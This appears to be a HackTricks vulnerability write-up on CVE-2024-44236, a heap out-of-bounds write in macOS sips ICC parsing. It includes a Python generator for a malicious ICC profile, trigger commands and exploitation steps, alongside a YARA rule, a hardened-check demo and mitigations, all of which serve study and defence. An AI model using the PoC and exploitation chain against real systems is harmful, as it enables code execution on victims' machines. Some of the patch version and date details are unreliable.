# WWW2Exec - sips ICC Profile Out-of-Bounds Write (CVE-2024-44236)

{{#include ../../banners/hacktricks-training.md}}

## Overview

An out-of-bounds **zero-write** in the ICC profile parser of Apple macOS **Scriptable Image Processing System** (`sips`, build `sips-307` on macOS 15.0.1) lets an attacker corrupt heap memory and pivot that primitive into code execution. The bug sits in the handling of the `offsetToCLUT` field of the `lutAToBType` (`mAB `) and `lutBToAType` (`mBA `) tag types. The parser only checks `offsetToCLUT <= tagDataSize` and then zeroes 16 bytes starting at `buffer + offsetToCLUT`, so with `offsetToCLUT == tagDataSize` all **16 zero bytes land past the end of the heap buffer**. Combined with heap spraying, the attacker can zero allocator structures or C++ pointers that are dereferenced later, which yields an **arbitrary-write-to-exec** chain (CVE-2024-44236, CVSS 7.8).

> Apple patched the bug in macOS 15.2 / 14.7.1 (October 30, 2024). A second variant (CVE-2025-24185) was fixed in macOS 15.5 and iOS/iPadOS 18.5 on April 1, 2025.

## Vulnerable Code

```c
// Pseudocode extracted from sub_1000194D0 in sips-307 (macOS 15.0.1).
// `buffer` is the heap copy of the tag data, `tagDataSize` its length.
if (offsetToCLUT <= tagDataSize) {
    // BAD: the check only bounds the *start* of the write, never its end.
    // With offsetToCLUT == tagDataSize every one of the 16 zero bytes is
    // written past the allocation.
    for (uint32_t i = offsetToCLUT; i < offsetToCLUT + 16; i++)
        buffer[i] = 0;   // no bounds check against the allocated size!
}
```

## Exploitation Steps

1. **Craft a malicious `.icc` profile**
   * Build a minimal 128-byte ICC header (`acsp` magic at byte 36) and a tag table with one tag (e.g. `A2B0`) whose data is a `lutAToBType` (`mAB `) or `lutBToAType` (`mBA `) structure.
   * Set the structure's `offsetToCLUT` field (byte 24 of the tag data) equal to the tag size recorded in the tag table (`tagDataSize`).
   * Arrange the heap so that attacker-controlled or sensitive data sits right after the tag buffer, so the 16 zero bytes overlap allocator metadata.
2. **Trigger parsing with any sips operation that touches the profile**
   ```bash
   # verification path (no output file needed)
   sips --verifyColor evil.icc
   # or implicitly when converting images that embed the profile
   sips -s format png payload.jpg --out out.png
   ```
3.
   **Heap metadata corruption ➜ arbitrary write ➜ ROP**
   On Apple's default **`nano_zone` allocator**, metadata for 16-byte slots lives **immediately after** the aligned 0x1000 slab. By placing the profile's tag buffer at the end of such a slab, the 16 zero-writes clobber `meta->slot_B`. After a subsequent `free`, the poisoned pointer is enqueued in the tiny free list, which lets the attacker **allocate a fake object at an arbitrary address**, overwrite a C++ vtable pointer used by sips, and finally pivot execution into a ROP chain stored in the malicious ICC buffer.

### Quick PoC generator (Python 3)

```python
#!/usr/bin/env python3
# Build evil.icc: one lutAToBType ('mAB ') tag whose offsetToCLUT == tag size,
# so the parser's 16-byte zero-write starts exactly past the end of the tag buffer.
import struct

TAG_SIZE = 52                  # mAB tag data size (any value >= 32 works)
TAG_OFF = 128 + 4 + 12         # header + tag count + one 12-byte tag-table entry

hdr = bytearray(128)           # ICC header; the 'acsp' magic lives at byte 36, not 0
struct.pack_into('>I', hdr, 0, TAG_OFF + TAG_SIZE)   # total profile size
hdr[8:12], hdr[12:16] = b'\x04\x40\x00\x00', b'mntr'  # version 4.4, display class
hdr[16:20], hdr[20:24], hdr[36:40] = b'RGB ', b'XYZ ', b'acsp'

# lutAToBType layout: sig(0) reserved(4) in/out channels(8,9) then offsets to
# B curves(12) matrix(16) M curves(20) CLUT(24) A curves(28).
mab = bytearray(TAG_SIZE)
mab[0:4], mab[8], mab[9] = b'mAB ', 3, 3
struct.pack_into('>I', mab, 24, TAG_SIZE)   # offsetToCLUT = size (OOB start)

profile = bytes(hdr) + struct.pack('>I', 1)                       # tag count
profile += struct.pack('>4sII', b'A2B0', TAG_OFF, TAG_SIZE)       # tag-table entry
profile += bytes(mab)
open('evil.icc', 'wb').write(profile)
print('[+] Wrote evil.icc (%d bytes)' % len(profile))
```

### YARA detection rule

ICC profiles are big-endian, so the rule uses `uint32be()`; the tag table starts at byte 132 (128-byte header plus the 4-byte tag count) with 12-byte entries of signature, data offset and data size. The rule flags any `mAB `/`mBA ` tag whose `offsetToCLUT` leaves fewer than 16 bytes before the end of the tag, which covers the `offsetToCLUT == tagDataSize` case described above and the shorter overflows the same 16-byte loop produces for nearby offsets.

```yara
rule ICC_mAB_offsetToCLUT_anomaly
{
    meta:
        description = "mAB/mBA tag whose offsetToCLUT lies within 16 bytes of the tag end (CVE-2024-44236)"
        author      = "HackTricks"
    strings:
        $magic = { 61 63 73 70 }   // 'acsp', at header offset 36
    condition:
        $magic at 36 and
        for any i in (0 .. 10) : (        // first 11 tag-table entries
            // tag data offset = uint32be(132 + 12*i + 4); type sig is its first dword
            ( uint32be(uint32be(132 + 12*i + 4)) == 0x6D414220 or    // 'mAB '
              uint32be(uint32be(132 + 12*i + 4)) == 0x6D424120 ) and // 'mBA '
            // offsetToCLUT (byte 24 of the tag data) + 16 > tag size
            uint32be(uint32be(132 + 12*i + 4) + 24) + 16 > uint32be(132 + 12*i + 8)
        )
}
```

## Impact

Processing a crafted ICC profile with `sips` leads to **arbitrary code execution** in the context of the user running it, whether the tool is invoked directly or by a script or content handler that converts untrusted images. Because the profile can be embedded inside otherwise benign PNG/JPEG/TIFF images, the payload travels as image data rather than as an executable, so no Gatekeeper prompt is involved.
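The bounds check from the pseudocode above, its hardened form, and the tag-table walk behind the YARA rule, as an added C example that is not sips code and not Apple's. It builds a constructed profile of the same shape as `evil.icc`, copies the tag into a heap buffer followed by 16 canary bytes, and counts how many canary bytes each variant of the check lets the zero loop clobber, so the overflow is observed without an actual out-of-bounds write. The field offsets follow the ICC `lutAToBType`/`lutBToAType` layout (`offsetToCLUT` at byte 24 of the tag data); the function names, the canary trick and the `A2B0` tag choice are this example's own assumptions. The scanner generalises the page's `offsetToCLUT == tagDataSize` case to any offset within 16 bytes of the tag end, which is what the 16-byte loop implies.

```c
/* Added example: vulnerable vs hardened CLUT-offset check, plus a tag-table
 * scanner, run over a constructed ICC profile (same shape as evil.icc). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ICC_HDR_LEN 128
#define CLUT_OFF_FIELD 24   /* offsetToCLUT inside lutAToBType / lutBToAType */
#define ZERO_RUN 16         /* bytes the parser zeroes at offsetToCLUT */
#define CANARY 0xAA

static uint32_t be32(const uint8_t *p) {
    return (uint32_t)p[0] << 24 | (uint32_t)p[1] << 16 | (uint32_t)p[2] << 8 | p[3];
}
static void put32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

/* Constructed profile: 128-byte header, one A2B0 tag of type 'mAB ' with the
 * given size and offsetToCLUT. Caller frees the result. */
uint8_t *build_profile(uint32_t tag_size, uint32_t clut_off, size_t *len) {
    uint32_t tag_off = ICC_HDR_LEN + 4 + 12;        /* header + count + 1 entry */
    *len = tag_off + tag_size;
    uint8_t *p = calloc(1, *len);
    put32(p, (uint32_t)*len);                         /* profile size */
    memcpy(p + 36, "acsp", 4);                        /* magic */
    put32(p + ICC_HDR_LEN, 1);                        /* tag count */
    memcpy(p + 132, "A2B0", 4); put32(p + 136, tag_off); put32(p + 140, tag_size);
    uint8_t *t = p + tag_off;
    memcpy(t, "mAB ", 4); t[8] = 3; t[9] = 3;         /* type sig, 3 in / 3 out */
    put32(t + CLUT_OFF_FIELD, clut_off);
    return p;
}

/* Mirrors the page's pseudocode: only the start of the write is bounded. */
int zero_clut_vulnerable(uint8_t *tag, uint32_t tag_size, uint32_t clut_off) {
    if (clut_off > tag_size) return 0;
    for (uint32_t i = clut_off; i < clut_off + ZERO_RUN; i++) tag[i] = 0;
    return 1;
}

/* Hardened: the whole 16-byte run must fit, and the sum must not wrap. */
int zero_clut_hardened(uint8_t *tag, uint32_t tag_size, uint32_t clut_off) {
    if (clut_off > UINT32_MAX - ZERO_RUN || clut_off + ZERO_RUN > tag_size) return 0;
    for (uint32_t i = clut_off; i < clut_off + ZERO_RUN; i++) tag[i] = 0;
    return 1;
}

/* Copy the first tag into a heap buffer followed by ZERO_RUN canary bytes, run
 * the check, and return how many canary bytes were zeroed (0 == no overflow). */
int run_with_canary(const uint8_t *prof, size_t len,
                    int (*fn)(uint8_t *, uint32_t, uint32_t)) {
    uint32_t tag_off = be32(prof + 136), tag_size = be32(prof + 140);
    if ((size_t)tag_off + tag_size > len || tag_size < 32) return -1;
    uint8_t *buf = malloc(tag_size + ZERO_RUN);
    memcpy(buf, prof + tag_off, tag_size);
    memset(buf + tag_size, CANARY, ZERO_RUN);
    fn(buf, tag_size, be32(buf + CLUT_OFF_FIELD));
    int zeroed = 0;
    for (int i = 0; i < ZERO_RUN; i++) zeroed += buf[tag_size + i] != CANARY;
    free(buf);
    return zeroed;
}

/* Detection (same logic as the YARA rule): count mAB/mBA tags whose
 * offsetToCLUT leaves fewer than ZERO_RUN bytes before the tag end. */
int scan_profile(const uint8_t *p, size_t len) {
    if (len < ICC_HDR_LEN + 4 || memcmp(p + 36, "acsp", 4) != 0) return -1;
    uint32_t n = be32(p + ICC_HDR_LEN), bad = 0;
    for (uint32_t i = 0; i < n; i++) {
        size_t e = ICC_HDR_LEN + 4 + 12 * (size_t)i;  /* tag-table entry */
        if (e + 12 > len) return -1;
        uint32_t off = be32(p + e + 4), size = be32(p + e + 8);
        if (off > len || size > len - off || size < 32) continue;  /* not a full mAB/mBA */
        const uint8_t *t = p + off;
        if (memcmp(t, "mAB ", 4) != 0 && memcmp(t, "mBA ", 4) != 0) continue;
        if (be32(t + CLUT_OFF_FIELD) > size - ZERO_RUN) bad++;    /* clut + 16 > size */
    }
    return (int)bad;
}

/* Wrappers: build a profile with the given geometry and evaluate it. */
int demo_scan(uint32_t tag_size, uint32_t clut_off) {
    size_t len; uint8_t *p = build_profile(tag_size, clut_off, &len);
    int r = scan_profile(p, len); free(p); return r;
}
int demo_zeroed(uint32_t tag_size, uint32_t clut_off, int hardened) {
    size_t len; uint8_t *p = build_profile(tag_size, clut_off, &len);
    int r = run_with_canary(p, len, hardened ? zero_clut_hardened : zero_clut_vulnerable);
    free(p); return r;
}

int main(void) {
    printf("evil.icc shape  : flagged=%d zeroed(vuln)=%d zeroed(hardened)=%d\n",
           demo_scan(52, 52), demo_zeroed(52, 52, 0), demo_zeroed(52, 52, 1));
    printf("benign shape    : flagged=%d zeroed(vuln)=%d\n",
           demo_scan(52, 32), demo_zeroed(52, 32, 0));
    return 0;
}
```

Two points worth noticing: the hardened check tests the end of the write rather than its start, and guards the `clut_off + 16` addition against wrap-around, which a simple `<` instead of `<=` would still miss for very large offsets; and the scanner, unlike a signature match on `mAB ` alone, resolves each tag-table entry to its data and reads the real `offsetToCLUT`, so it does not fire on the many legitimate profiles that carry `mAB `/`mBA ` tags.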
## Detection & Mitigation

* **Patch.** Make sure the host runs a macOS build that contains the fix (macOS 15.2 / 14.7.1 or later, per the advisory above).
* Deploy the YARA rule above on mail gateways and EDR. ICC profiles usually travel embedded in images (PNG `iCCP` chunk, which is zlib-compressed; JPEG APP2 `ICC_PROFILE` segment; TIFF), and the rule only matches uncompressed profile data, so extract the profile first, e.g. `exiftool -icc_profile -b <file> > profile.icc`.
* Strip or sanitise embedded ICC profiles from untrusted files before further processing: `exiftool -icc_profile= -overwrite_original <file>`.
* Process unknown images inside a disposable VM or sandbox rather than on an analyst's primary machine.
* For DFIR, search process-execution telemetry and the unified log for `sips` runs (e.g. `--verifyColor`) against files from untrusted sources, and for `sips` crash reports, which indicate a failed exploitation attempt.

## References

* Trend Micro Zero Day Initiative advisory ZDI-24-1445, "Apple macOS ICC Profile Parsing Out-of-Bounds Write Remote Code Execution (CVE-2024-44236)": https://www.zerodayinitiative.com/advisories/ZDI-24-1445/
* Apple security updates HT213981, "About the security content of macOS Sonoma 15.2": https://support.apple.com/en-us/HT213981

{{#include ../../banners/hacktricks-training.md}}